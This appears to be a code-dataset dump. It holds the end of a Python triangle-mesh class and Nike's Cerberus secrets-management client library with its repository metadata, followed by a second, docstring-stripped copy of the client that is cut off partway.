self.labels = ObservableArray(labels.shape, dtype=np.int)
self.labels[:] = labels
self.labels.attach(self)
else:
self.labels = ObservableArray(polys.shape[0], dtype=np.int)
self.labels[:] = np.zeros(self.labels.shape, dtype=np.int)
self.labels.attach(self)
self._AbstractMesh__poly_size = 3
self._AbstractMesh__finished_loading = True
def __load_operations(self):
self._dont_update = True
self._AbstractMesh__boundary_needs_update = True
self._AbstractMesh__simplex_centroids = None
self._AbstractMesh__edges, \
self._AbstractMesh__adj_vtx2vtx, \
self._AbstractMesh__adj_vtx2edge, \
self._AbstractMesh__adj_vtx2poly, \
self._AbstractMesh__adj_edge2vtx, \
self._AbstractMesh__adj_edge2edge, \
self._AbstractMesh__adj_edge2poly, \
self._AbstractMesh__adj_poly2vtx, \
self._AbstractMesh__adj_poly2edge, \
self._AbstractMesh__adj_poly2poly = get_connectivity_info(self.num_vertices, self.polys)
self._AbstractMesh__update_bounding_box()
self.reset_clipping()
self.poly_normals = compute_face_normals(self.vertices, self.polys)
self.vtx_normals = compute_vertex_normals(self.poly_normals, self.adj_vtx2poly._NList__list)
self.__compute_metrics()
self._AbstractMesh__simplex_centroids = None
self._dont_update = False
self.update()
def __load_from_file(self, filename):
ext = filename.split('.')[-1]
if ext == 'obj':
self.vertices, self._AbstractMesh__polys, self.poly_normals, self.uvcoords, self.coor, self.groups = IO.read_obj(filename)
self.vertices.attach(self)
self._AbstractMesh__polys.attach(self)
self.poly_normals.attach(self)
self.uvcoords.attach(self)
self.coor.attach(self)
elif ext == 'mtl':
self.material = IO.read_mtl(filename)
return
elif ext == 'off':
self.vertices, self._AbstractMesh__polys = IO.read_off(filename)
self.vertices.attach(self)
self._AbstractMesh__polys.attach(self)
elif ext == 'mesh':
self.vertices, self._AbstractMesh__polys, labels = IO.read_mesh(filename)
self.vertices.attach(self)
self._AbstractMesh__polys.attach(self)
else:
raise Exception("Only .obj, .off and .mesh files are supported")
self.labels = ObservableArray(self.num_polys, dtype=np.int)
self.labels[:] = np.zeros(self.labels.shape, dtype=np.int) if ext != 'mesh' else labels
self.labels.attach(self)
self.__load_operations()
return self
def save_file(self, filename):
ext = filename.split('.')[-1]
if ext == 'obj':
IO.save_obj(self, filename)
elif ext == 'off':
IO.save_off(self, filename)
elif ext == 'mesh':
IO.save_mesh(self, filename)
else:
raise Exception("Only .obj, .off and .mesh files are supported")
def __compute_metrics(self):
self.simplex_metrics['area'] = triangle_area(self.vertices, self.polys)
self.simplex_metrics['aspect_ratio'] = triangle_aspect_ratio(self.vertices, self.polys)
def update_metrics(self):
self.__compute_metrics()
@property
def _map_poly_indices(self):
return self.__map_poly_indices
def boundary(self):
if (self._AbstractMesh__boundary_needs_update):
clipping_range = super(Trimesh, self).boundary()
self._AbstractMesh__visible_polys = clipping_range
self._AbstractMesh__boundary_cached = clipping_range
self._AbstractMesh__boundary_needs_update = False
self.__map_poly_indices = []
counter = 0
for c in clipping_range:
if c:
self.__map_poly_indices.append(counter)
else:
counter = counter + 1
return self.polys[self._AbstractMesh__boundary_cached], self._AbstractMesh__boundary_cached
def as_edges_flat(self):
boundaries = self.boundary()[0]
edges = np.c_[boundaries[:, :2], boundaries[:, 1:], boundaries[:, 2], boundaries[:, 0]].flatten()
return edges
def _as_threejs_triangle_soup(self):
tris = self.vertices[self.boundary()[0].flatten()]
return tris.astype(np.float32), compute_three_normals(tris).astype(np.float32)
def as_triangles(self):
return self.boundary()[0].flatten().astype("uint32")
def _as_threejs_colors(self, colors=None):
if colors is not None:
return np.repeat(colors, 3, axis=0)
return np.repeat(self.boundary()[1], 3)
@property
def num_triangles(self):
return self.num_polys
def vertex_remove(self, vtx_id):
self.vertices_remove([vtx_id])
def vertices_remove(self, vtx_ids):
self._dont_update = True
vtx_ids = np.array(vtx_ids)
for v_id in vtx_ids:
self.vertices = np.delete(self.vertices, v_id, 0)
condition = ((self._AbstractMesh__polys[:, 0] != v_id) &
(self._AbstractMesh__polys[:, 1] != v_id) &
(self._AbstractMesh__polys[:, 2] != v_id))
if self.labels is not None:
self.labels = self.labels[condition]
self._AbstractMesh__polys = self._AbstractMesh__polys[condition]
self._AbstractMesh__polys[(self._AbstractMesh__polys[:, 0] > v_id)] -= np.array([1, 0, 0])
self._AbstractMesh__polys[(self._AbstractMesh__polys[:, 1] > v_id)] -= np.array([0, 1, 0])
self._AbstractMesh__polys[(self._AbstractMesh__polys[:, 2] > v_id)] -= np.array([0, 0, 1])
vtx_ids[vtx_ids > v_id] -= 1
self.__load_operations()
def poly_add(self, new_poly):
self.polys_add(new_poly)
def polys_add(self, new_polys):
AbstractMesh.polys_add(self, new_polys)
self.__load_operations()
def poly_remove(self, poly_id):
self.polys_remove([poly_id])
def polys_remove(self, poly_ids):
AbstractMesh.polys_remove(self, poly_ids)
self.__load_operations()
def tessellate(self):
return self.polys
@property
def edge_is_manifold(self):
val = self.edge_valence
return np.logical_and(val > 0, val < 3)
@property
def poly_is_on_boundary(self):
return np.logical_not(np.all(self.adj_poly2poly != -1, axis = 1))
@property
def edge_is_on_boundary(self):
boundary_edges = self.adj_poly2edge[self.poly_is_on_boundary].reshape(-1)
boundary_edges = [e for e in boundary_edges if len(self.adj_edge2poly[e]) == 1]
bool_vec = np.zeros((self.num_edges), dtype=np.bool)
bool_vec[boundary_edges] = True
return bool_vec
@property
def vert_is_on_boundary(self):
boundary_verts = self.edges[self.edge_is_on_boundary].reshape(-1)
bool_vec = np.zeros((self.num_vertices), dtype=np.bool)
bool_vec[boundary_verts] = True
return bool_vec
@property
def area(self):
return np.sum(self.simplex_metrics['area'][1])
def normalize_area(self):
scale_factor = 1.0/np.sqrt(self.area)
self.transform_scale([scale_factor, scale_factor, scale_factor])
self.simplex_metrics['area'] = triangle_area(self.vertices, self.polys)
def sharp_creases(self, threshold=1.0472):
e2p = self.adj_edge2poly.array
indices = np.logical_not(np.all(e2p != -1, axis=1))
angles = utilities.angle_between_vectors(self.poly_normals[e2p[:,0]], self.poly_normals[e2p[:,1]], True)[0]
result = angles > threshold
result[indices] = True
return result
def fix_poly_order():
normals = self.poly_normals
center = self.mesh_centroid
a = (normals-center)
norm = np.linalg.norm(a, axis=1)
norm.shape = (-1,1)
a /= norm
condition = np.einsum("ij,ij->i", a, normals) > 0
self.polys[condition] = np.flip(mesh.polys[condition], axis=1)
self.__load_operations()
@property
@deprecated("Use the method adj_poly2poly instead")
def face2face(self):
return self._AbstractMesh__adj_poly2poly
| true | true |
f723344f24fecf2c220f77795855aaec82f60dcc | 27,851 | py | Python | cerberus/client.py | towermagi/cerberus-python-client | ef38356822e722fcb6a6ed4a1b38a5b493e753ae | [
"Apache-2.0"
] | null | null | null | cerberus/client.py | towermagi/cerberus-python-client | ef38356822e722fcb6a6ed4a1b38a5b493e753ae | [
"Apache-2.0"
] | null | null | null | cerberus/client.py | towermagi/cerberus-python-client | ef38356822e722fcb6a6ed4a1b38a5b493e753ae | [
"Apache-2.0"
] | null | null | null | """
Copyright 2016-present Nike, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
You may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and* limitations under the License.*
"""
# For python 2.7
from __future__ import print_function
import requests
from .aws_auth import AWSAuth
from .user_auth import UserAuth
from . import CerberusClientException, CLIENT_VERSION
from .util import throw_if_bad_response, get_with_retry, post_with_retry, put_with_retry, delete_with_retry, head_with_retry
import ast
import json
import logging
import sys
import warnings
import os
logger = logging.getLogger(__name__)
class CerberusClient(object):
""" Cerberus Python Client for interacting with
Cerberus APIs. Authentication is done
via the Auth Classes"""
HEADERS = {'Content-Type': 'application/json'}
def __init__(self, cerberus_url, username=None, password=None,
region='us-west-2', token=None, aws_session=None,
verbose=None):
"""
Username and password are optional, they are not needed for IAM Role Auth. If aws_session is set with
a botocore.session.Session object, the Cerberus client will sign the request using the session provided
instead of the default session.
verbose (default True) controls if the cerberus library will output some debuging statements to the
console (sys.stderr).
"""
self.cerberus_url = cerberus_url
self.username = username or ""
self.password = password or ""
self.region = region
self.token = token
if verbose is None or type(verbose) != bool:
self.verbose = True
else:
self.verbose = verbose
self.aws_session = aws_session
if self.token is None:
self._set_token()
self.HEADERS['X-Cerberus-Token'] = self.token
self.HEADERS['X-Cerberus-Client'] = 'CerberusPythonClient/' + CLIENT_VERSION
def _add_slash(self, string=None):
""" if a string doesn't end in a '/' add one """
if(not str.endswith(string, '/')):
return str.join('', [string, '/'])
return str(string)
def _set_token(self):
"""Set the Cerberus token based on auth type"""
try:
self.token = os.environ['CERBERUS_TOKEN']
if self.verbose:
print("Overriding Cerberus token with environment variable.", file=sys.stderr)
logger.info("Overriding Cerberus token with environment variable.")
return
except:
pass
if self.username:
ua = UserAuth(self.cerberus_url, self.username, self.password)
self.token = ua.get_token()
else:
awsa = AWSAuth(self.cerberus_url, region=self.region, aws_session=self.aws_session, verbose=self.verbose)
self.token = awsa.get_token()
def get_token(self):
"""Return a client token from Cerberus"""
return self.token
def get_roles(self):
"""Return all the roles (IAM or User Groups) that can be granted to a safe deposit box.
Roles are permission levels that are granted to IAM or User Groups. Associating the id for the write role
would allow that IAM or User Group to write in the safe deposit box."""
roles_resp = get_with_retry(self.cerberus_url + '/v1/role',
headers=self.HEADERS)
throw_if_bad_response(roles_resp)
return roles_resp.json()
def get_role(self, key):
"""Return id of named role."""
json_resp = self.get_roles()
for item in json_resp:
if key in item["name"]:
return item["id"]
raise CerberusClientException("Key '%s' not found" % key)
def list_roles(self):
"""Simplified version of get_roles that returns a dict of just name: id for the roles"""
json_resp = self.get_roles()
temp_dict = {}
for item in json_resp:
temp_dict[item["name"]] = item["id"]
return temp_dict
def get_categories(self):
""" Return a list of categories that a safe deposit box can belong to"""
sdb_resp = get_with_retry(self.cerberus_url + '/v1/category',
headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()
def create_sdb(self, name, category_id, owner, description="", user_group_permissions=None,
iam_principal_permissions=None):
"""Create a safe deposit box.
You need to refresh your token before the iam role is granted permission to the new safe deposit box.
Keyword arguments:
name (string) -- name of the safe deposit box
category_id (string) -- category id that determines where to store the sdb. (ex: shared, applications)
owner (string) -- AD group that owns the safe deposit box
description (string) -- Description of the safe deposit box
user_group_permissions (list) -- list of dictionaries containing the key name and maybe role_id
iam_principal_permissions (list) -- list of dictionaries containing the key name iam_principal_arn
and role_id
"""
# Do some sanity checking
if user_group_permissions is None:
user_group_permissions = []
if iam_principal_permissions is None:
iam_principal_permissions = []
if list != type(user_group_permissions):
raise(TypeError('Expected list, but got ' + str(type(user_group_permissions))))
if list != type(iam_principal_permissions):
raise(TypeError('Expected list, but got ' + str(type(iam_principal_permissions))))
temp_data = {
"name": name,
"description": description,
"category_id": category_id,
"owner": owner,
}
if len(user_group_permissions) > 0:
temp_data["user_group_permissions"] = user_group_permissions
if len(iam_principal_permissions) > 0:
temp_data["iam_principal_permissions"] = iam_principal_permissions
data = json.encoder.JSONEncoder().encode(temp_data)
sdb_resp = post_with_retry(self.cerberus_url + '/v2/safe-deposit-box', data=str(data), headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()
def delete_sdb(self, sdb_id):
""" Delete a safe deposit box specified by id
Keyword arguments:
sdb_id -- this is the id of the safe deposit box, not the path."""
sdb_resp = delete_with_retry(self.cerberus_url + '/v2/safe-deposit-box/' + sdb_id,
headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp
def get_sdbs(self):
""" Return a list of each SDB the client is authorized to view"""
sdb_resp = get_with_retry(self.cerberus_url + '/v2/safe-deposit-box',
headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()
def get_sdb_path(self, sdb):
"""Return the path for a SDB"""
sdb_id = self.get_sdb_id(sdb)
sdb_resp = get_with_retry(
self.cerberus_url + '/v1/safe-deposit-box/' + sdb_id + '/',
headers=self.HEADERS
)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()['path']
def get_sdb_keys(self, path):
"""Return the keys for a SDB, which are need for the full secure data path"""
list_resp = get_with_retry(
self.cerberus_url + '/v1/secret/' + path + '/?list=true',
headers=self.HEADERS
)
throw_if_bad_response(list_resp)
return list_resp.json()['data']['keys']
def get_sdb_id(self, sdb):
""" Return the ID for the given safe deposit box.
Keyword arguments:
sdb -- This is the name of the safe deposit box, not the path"""
json_resp = self.get_sdbs()
for r in json_resp:
if r['name'] == sdb:
return str(r['id'])
# If we haven't returned yet then we didn't find what we were
# looking for.
raise CerberusClientException("'%s' not found" % sdb)
def get_sdb_id_by_path(self, sdb_path):
""" Given the path, return the ID for the given safe deposit box."""
json_resp = self.get_sdbs()
# Deal with the supplied path possibly missing an ending slash
path = self._add_slash(sdb_path)
for r in json_resp:
if r['path'] == path:
return str(r['id'])
# If we haven't returned yet then we didn't find what we were
# looking for.
raise CerberusClientException("'%s' not found" % sdb_path)
def get_sdb_by_id(self, sdb_id):
""" Return the details for the given safe deposit box id
Keyword arguments:
sdb_id -- this is the id of the safe deposit box, not the path.
"""
sdb_resp = get_with_retry(self.cerberus_url + '/v2/safe-deposit-box/' + sdb_id,
headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()
def get_sdb_by_path(self, sdb_path):
""" Return the details for the given safe deposit box path.
Keyword arguments:
sdb_path -- this is the path for the given safe deposit box. ex: ('shared/my-test-box')
"""
return self.get_sdb_by_id(self.get_sdb_id_by_path(sdb_path))
def get_sdb_by_name(self, sdb_name):
""" Return the details for the given safe deposit box name.
Keyword arguments:
sdb_name -- this is the name for the given safe deposit box. ex: ('My Test Box')
"""
return self.get_sdb_by_id(self.get_sdb_id(sdb_name))
def get_sdb_secret_version_paths(self, sdb_id):
""" Get SDB secret version paths. This function takes the sdb_id """
sdb_resp = get_with_retry(str.join('', [self.cerberus_url, '/v1/sdb-secret-version-paths/', sdb_id]),
headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()
def get_sdb_secret_version_paths_by_path(self, sdb_path):
""" Get SDB secret version paths. This function takes the sdb_path """
return self.get_sdb_secret_version_paths(self.get_sdb_id_by_path(sdb_path))
def list_sdbs(self):
""" Return sdbs by Name """
sdb_raw = self.get_sdbs()
sdbs = []
for s in sdb_raw:
sdbs.append(s['name'])
return sdbs
def update_sdb(self, sdb_id, owner=None, description=None, user_group_permissions=None,
iam_principal_permissions=None):
"""
Update a safe deposit box.
Keyword arguments:
owner (string) -- AD group that owns the safe deposit box
description (string) -- Description of the safe deposit box
user_group_permissions (list) -- list of dictionaries containing the key name and maybe role_id
iam_principal_permissions (list) -- list of dictionaries containing the key name iam_principal_arn
and role_id
"""
# Grab current data
old_data = self.get_sdb_by_id(sdb_id)
# Assemble information to update
temp_data = {}
keys = ('owner', 'description', 'iam_principal_permissions', 'user_group_permissions')
for k in keys:
if k in old_data:
temp_data[k] = old_data[k]
if owner is not None:
temp_data["owner"] = owner
if description is not None:
temp_data["description"] = description
if user_group_permissions is not None and len(user_group_permissions) > 0:
temp_data["user_group_permissions"] = user_group_permissions
if iam_principal_permissions is not None and len(iam_principal_permissions) > 0:
temp_data["iam_principal_permissions"] = iam_principal_permissions
data = json.encoder.JSONEncoder().encode(temp_data)
sdb_resp = put_with_retry(self.cerberus_url + '/v2/safe-deposit-box/' + sdb_id, data=str(data),
headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()
###------ Files ------###
def delete_file(self, secure_data_path):
"""Delete a file at the given secure data path"""
secret_resp = delete_with_retry(self.cerberus_url + '/v1/secure-file/' + secure_data_path,
headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp
def get_file_metadata(self, secure_data_path, version=None):
"""Get just the metadata for a file, not the content"""
if not version:
version = "CURRENT"
payload = {'versionId': str(version)}
secret_resp = head_with_retry(str.join('', [self.cerberus_url, '/v1/secure-file/', secure_data_path]),
params=payload, headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp.headers
def _get_file(self, secure_data_path, version=None):
"""
Return the file stored at the secure data path
Keyword arguments:
secure_data_path (string) -- full path in the secret deposit box that contains the key
/shared/sdb-path/secret
"""
if not version:
version = "CURRENT"
payload = {'versionId': str(version)}
secret_resp = get_with_retry(str.join('', [self.cerberus_url, '/v1/secure-file/', secure_data_path]),
params=payload, headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp
def _parse_metadata_filename(self, metadata):
"""
Parse the header metadata to pull out the filename and then store it under the key 'filename'
"""
index = metadata['Content-Disposition'].index('=')+1
metadata['filename'] = metadata['Content-Disposition'][index:].replace('"', '')
return metadata
def get_file(self, secure_data_path, version=None):
"""
Return a requests.structures.CaseInsensitiveDict object containing a file and the
metadata/header information around it.
The binary data of the file is under the key 'data'
"""
query = self._get_file(secure_data_path, version)
resp = query.headers.copy()
resp = self._parse_metadata_filename(resp)
resp['data'] = query.content
return resp
def get_file_data(self, secure_data_path, version=None):
"""
Return the data of a file stored at the secure data path
This only returns the file data, and does not include any of the meta information stored with it.
Keyword arguments:
secure_data_path (string) -- full path in the secret deposit box that contains the file key
"""
return self._get_file(secure_data_path, version).content
def get_file_versions(self, secure_data_path, limit=None, offset=None):
"""
Get versions of a particular file
This is just a shim to get_secret_versions
secure_data_path -- full path to the file in the safety deposit box
limit -- Default(100), limits how many records to be returned from the api at once.
offset -- Default(0), used for pagination. Will request records from the given offset.
"""
return self.get_secret_versions(secure_data_path, limit, offset)
def _get_all_file_version_ids(self, secure_data_path, limit=None):
"""
Convenience function that returns a generator that will paginate over the file version ids
secure_data_path -- full path to the file in the safety deposit box
limit -- Default(100), limits how many records to be returned from the api at once.
"""
offset = 0
# Prime the versions dictionary so that all the logic can happen in the loop
versions = {'has_next': True, 'next_offset': 0}
while (versions['has_next']):
offset = versions['next_offset']
versions = self.get_file_versions(secure_data_path, limit, offset)
for summary in versions['secure_data_version_summaries']:
yield summary
def _get_all_file_versions(self, secure_data_path, limit=None):
"""
Convenience function that returns a generator yielding the contents of all versions of
a file and its version info
secure_data_path -- full path to the file in the safety deposit box
limit -- Default(100), limits how many records to be returned from the api at once.
"""
for secret in self._get_all_file_version_ids(secure_data_path, limit):
yield {'secret': self.get_file_data(secure_data_path, version=secret['id']),
'version': secret}
def list_files(self, secure_data_path, limit=None, offset=None):
"""Return the list of files in the path. May need to be paginated"""
# Make sure that limit and offset are in range.
# Set the normal defaults
if not limit or limit <= 0:
limit = 100
if not offset or offset < 0:
offset = 0
payload = {'limit': str(limit), 'offset': str(offset)}
# Because of the addition of versionId and the way URLs are constructed, secure_data_path should
# always end in a '/'.
secure_data_path = self._add_slash(secure_data_path)
secret_resp = get_with_retry(self.cerberus_url + '/v1/secure-files/' + secure_data_path,
params=payload, headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp.json()
def put_file(self, secure_data_path, filehandle, content_type=None):
"""
Upload a file to a secure data path provided
Keyword arguments:
secure_data_path -- full path in the safety deposit box that contains the file key to store things under
filehandle -- Pass an opened filehandle to the file you want to upload.
Make sure that the file was opened in binary mode, otherwise the size calculations
can be off for text files.
content_type -- Optional. Set the Mime type of the file you're uploading.
"""
# Parse out the filename from the path
filename = secure_data_path.rsplit('/', 1)
if content_type:
data = {'file-content': (filename, filehandle, content_type)}
else:
data = {'file-content': (filename, filehandle)}
headers = self.HEADERS.copy()
if 'Content-Type' in headers:
headers.__delitem__('Content-Type')
secret_resp = post_with_retry(self.cerberus_url + '/v1/secure-file/' + secure_data_path,
files=data, headers=headers)
throw_if_bad_response(secret_resp)
return secret_resp
###------ Secrets -----####
def delete_secret(self, secure_data_path):
"""Delete a secret from the given secure data path"""
secret_resp = delete_with_retry(self.cerberus_url + '/v1/secret/' + secure_data_path,
headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp
def get_secret(self, secure_data_path, key, version=None):
"""
(Deprecated)Return the secret based on the secure data path and key
This method is deprecated because it misleads users into thinking they're only getting one value from Cerberus
when in reality they're getting all values, from which a single value is returned.
Use get_secrets_data(secure_data_path)[key] instead.
(See https://github.com/Nike-Inc/cerberus-python-client/issues/18)
"""
warnings.warn(
"get_secret is deprecated, use get_secrets_data instead",
DeprecationWarning
)
secret_resp_json = self._get_secrets(secure_data_path, version)
if key in secret_resp_json['data']:
return secret_resp_json['data'][key]
else:
raise CerberusClientException("Key '%s' not found" % key)
def _get_secrets(self, secure_data_path, version=None):
"""
Return full json secrets based on the secure data path
Keyword arguments:
secure_data_path (string) -- full path in the secret deposit box that contains the key
/shared/sdb-path/secret
"""
if not version:
version = "CURRENT"
payload = {'versionId': str(version)}
secret_resp = get_with_retry(str.join('', [self.cerberus_url, '/v1/secret/', secure_data_path]),
params=payload, headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp.json()
def get_secrets(self, secure_data_path, version=None):
"""(Deprecated)Return json secrets based on the secure data path
This method is deprecated because an addition step of reading value with ['data'] key from the returned
data is required to get secrets, which contradicts the method name.
Use get_secrets_data(secure_data_path) instead.
(See https://github.com/Nike-Inc/cerberus-python-client/issues/19)
"""
warnings.warn(
"get_secrets is deprecated, use get_secrets_data instead",
DeprecationWarning
)
return self._get_secrets(secure_data_path, version)
def get_secrets_data(self, secure_data_path, version=None):
"""Return json secrets based on the secure data path
Keyword arguments:
secure_data_path (string) -- full path in the secret deposit box that contains the key
"""
return self._get_secrets(secure_data_path, version)['data']
def get_secret_versions(self, secure_data_path, limit=None, offset=None):
"""
Get versions of a particular secret key
secure_data_path -- full path to the key in the safety deposit box
limit -- Default(100), limits how many records to be returned from the api at once.
offset -- Default(0), used for pagination. Will request records from the given offset.
"""
# Make sure that limit and offset are in range.
# Set the normal defaults
if not limit or limit <= 0:
limit = 100
if not offset or offset < 0:
offset = 0
payload = {'limit': str(limit), 'offset': str(offset)}
secret_resp = get_with_retry(str.join('', [self.cerberus_url, '/v1/secret-versions/', secure_data_path]),
params=payload, headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp.json()
def _get_all_secret_version_ids(self, secure_data_path, limit=None):
"""
Convenience function that returns a generator that will paginate over the secret version ids
secure_data_path -- full path to the key in the safety deposit box
limit -- Default(100), limits how many records to be returned from the api at once.
"""
offset = 0
# Prime the versions dictionary so that all the logic can happen in the loop
versions = {'has_next': True, 'next_offset': 0}
while (versions['has_next']):
offset = versions['next_offset']
versions = self.get_secret_versions(secure_data_path, limit, offset)
for summary in versions['secure_data_version_summaries']:
yield summary
def _get_all_secret_versions(self, secure_data_path, limit=None):
"""
Convenience function that returns a generator yielding the contents of secrets and their version info
secure_data_path -- full path to the key in the safety deposit box
limit -- Default(100), limits how many records to be returned from the api at once.
"""
for secret in self._get_all_secret_version_ids(secure_data_path, limit):
yield {'secret': self.get_secrets_data(secure_data_path, version=secret['id']),
'version': secret}
def list_secrets(self, secure_data_path):
"""Return json secrets based on the secure_data_path, this will list keys in a folder"""
# Because of the addition of versionId and the way URLs are constructed, secure_data_path should
# always end in a '/'.
secure_data_path = self._add_slash(secure_data_path)
secret_resp = get_with_retry(self.cerberus_url + '/v1/secret/' + secure_data_path + '?list=true',
headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp.json()
def put_secret(self, secure_data_path, secret, merge=True):
"""Write secret(s) to a secure data path provided a dictionary of key/values
Keyword arguments:
secure_data_path -- full path in the safety deposit box that contains the key
secret -- A dictionary containing key/values to be written at the secure data path
merge -- Boolean that determines if the provided secret keys should be merged with
the values already present at the secure data path. If False the keys will
completely overwrite what was stored at the secure data path. (default True)
"""
# json encode the input. Cerberus is sensitive to double vs single quotes.
# an added bonus is that json encoding transforms python2 unicode strings
# into a compatible format.
data = json.encoder.JSONEncoder().encode(secret)
if merge:
data = self.secret_merge(secure_data_path, secret)
secret_resp = post_with_retry(self.cerberus_url + '/v1/secret/' + secure_data_path,
data=str(data), headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp
def secret_merge(self, secure_data_path, key):
"""Compare key/values at secure_data_path and merges them. New values will overwrite old."""
get_resp = get_with_retry(self.cerberus_url + '/v1/secret/' + secure_data_path, headers=self.HEADERS)
temp_key = {}
# Ignore a return of 404 since it means the key might not exist
if get_resp.status_code == requests.codes.bad and get_resp.status_code not in [403, 404]:
throw_if_bad_response(get_resp)
elif get_resp.status_code in [403, 404]:
temp_key = {}
else:
temp_key = get_resp.json()['data']
# Allow key to be either a string describing a dict or a dict.
if type(key) == str:
temp_key.update(ast.literal_eval(key))
else:
temp_key.update(key)
# This is a bit of a hack to get around python 2 treating unicode strings
# differently. Cerberus will throw a 400 if we try to post python 2 style
# unicode stings as the payload.
combined_key = json.encoder.JSONEncoder().encode(temp_key)
return combined_key
| 41.818318 | 124 | 0.637787 |
from __future__ import print_function
import requests
from .aws_auth import AWSAuth
from .user_auth import UserAuth
from . import CerberusClientException, CLIENT_VERSION
from .util import throw_if_bad_response, get_with_retry, post_with_retry, put_with_retry, delete_with_retry, head_with_retry
import ast
import json
import logging
import sys
import warnings
import os
logger = logging.getLogger(__name__)
class CerberusClient(object):
HEADERS = {'Content-Type': 'application/json'}
def __init__(self, cerberus_url, username=None, password=None,
region='us-west-2', token=None, aws_session=None,
verbose=None):
self.cerberus_url = cerberus_url
self.username = username or ""
self.password = password or ""
self.region = region
self.token = token
if verbose is None or type(verbose) != bool:
self.verbose = True
else:
self.verbose = verbose
self.aws_session = aws_session
if self.token is None:
self._set_token()
self.HEADERS['X-Cerberus-Token'] = self.token
self.HEADERS['X-Cerberus-Client'] = 'CerberusPythonClient/' + CLIENT_VERSION
def _add_slash(self, string=None):
if(not str.endswith(string, '/')):
return str.join('', [string, '/'])
return str(string)
def _set_token(self):
try:
self.token = os.environ['CERBERUS_TOKEN']
if self.verbose:
print("Overriding Cerberus token with environment variable.", file=sys.stderr)
logger.info("Overriding Cerberus token with environment variable.")
return
except:
pass
if self.username:
ua = UserAuth(self.cerberus_url, self.username, self.password)
self.token = ua.get_token()
else:
awsa = AWSAuth(self.cerberus_url, region=self.region, aws_session=self.aws_session, verbose=self.verbose)
self.token = awsa.get_token()
def get_token(self):
return self.token
def get_roles(self):
roles_resp = get_with_retry(self.cerberus_url + '/v1/role',
headers=self.HEADERS)
throw_if_bad_response(roles_resp)
return roles_resp.json()
def get_role(self, key):
json_resp = self.get_roles()
for item in json_resp:
if key in item["name"]:
return item["id"]
raise CerberusClientException("Key '%s' not found" % key)
def list_roles(self):
json_resp = self.get_roles()
temp_dict = {}
for item in json_resp:
temp_dict[item["name"]] = item["id"]
return temp_dict
def get_categories(self):
sdb_resp = get_with_retry(self.cerberus_url + '/v1/category',
headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()
def create_sdb(self, name, category_id, owner, description="", user_group_permissions=None,
iam_principal_permissions=None):
if user_group_permissions is None:
user_group_permissions = []
if iam_principal_permissions is None:
iam_principal_permissions = []
if list != type(user_group_permissions):
raise(TypeError('Expected list, but got ' + str(type(user_group_permissions))))
if list != type(iam_principal_permissions):
raise(TypeError('Expected list, but got ' + str(type(iam_principal_permissions))))
temp_data = {
"name": name,
"description": description,
"category_id": category_id,
"owner": owner,
}
if len(user_group_permissions) > 0:
temp_data["user_group_permissions"] = user_group_permissions
if len(iam_principal_permissions) > 0:
temp_data["iam_principal_permissions"] = iam_principal_permissions
data = json.encoder.JSONEncoder().encode(temp_data)
sdb_resp = post_with_retry(self.cerberus_url + '/v2/safe-deposit-box', data=str(data), headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()
def delete_sdb(self, sdb_id):
sdb_resp = delete_with_retry(self.cerberus_url + '/v2/safe-deposit-box/' + sdb_id,
headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp
def get_sdbs(self):
sdb_resp = get_with_retry(self.cerberus_url + '/v2/safe-deposit-box',
headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()
def get_sdb_path(self, sdb):
sdb_id = self.get_sdb_id(sdb)
sdb_resp = get_with_retry(
self.cerberus_url + '/v1/safe-deposit-box/' + sdb_id + '/',
headers=self.HEADERS
)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()['path']
def get_sdb_keys(self, path):
list_resp = get_with_retry(
self.cerberus_url + '/v1/secret/' + path + '/?list=true',
headers=self.HEADERS
)
throw_if_bad_response(list_resp)
return list_resp.json()['data']['keys']
def get_sdb_id(self, sdb):
json_resp = self.get_sdbs()
for r in json_resp:
if r['name'] == sdb:
return str(r['id'])
raise CerberusClientException("'%s' not found" % sdb)
def get_sdb_id_by_path(self, sdb_path):
json_resp = self.get_sdbs()
path = self._add_slash(sdb_path)
for r in json_resp:
if r['path'] == path:
return str(r['id'])
raise CerberusClientException("'%s' not found" % sdb_path)
def get_sdb_by_id(self, sdb_id):
sdb_resp = get_with_retry(self.cerberus_url + '/v2/safe-deposit-box/' + sdb_id,
headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()
def get_sdb_by_path(self, sdb_path):
return self.get_sdb_by_id(self.get_sdb_id_by_path(sdb_path))
def get_sdb_by_name(self, sdb_name):
return self.get_sdb_by_id(self.get_sdb_id(sdb_name))
def get_sdb_secret_version_paths(self, sdb_id):
sdb_resp = get_with_retry(str.join('', [self.cerberus_url, '/v1/sdb-secret-version-paths/', sdb_id]),
headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()
def get_sdb_secret_version_paths_by_path(self, sdb_path):
return self.get_sdb_secret_version_paths(self.get_sdb_id_by_path(sdb_path))
def list_sdbs(self):
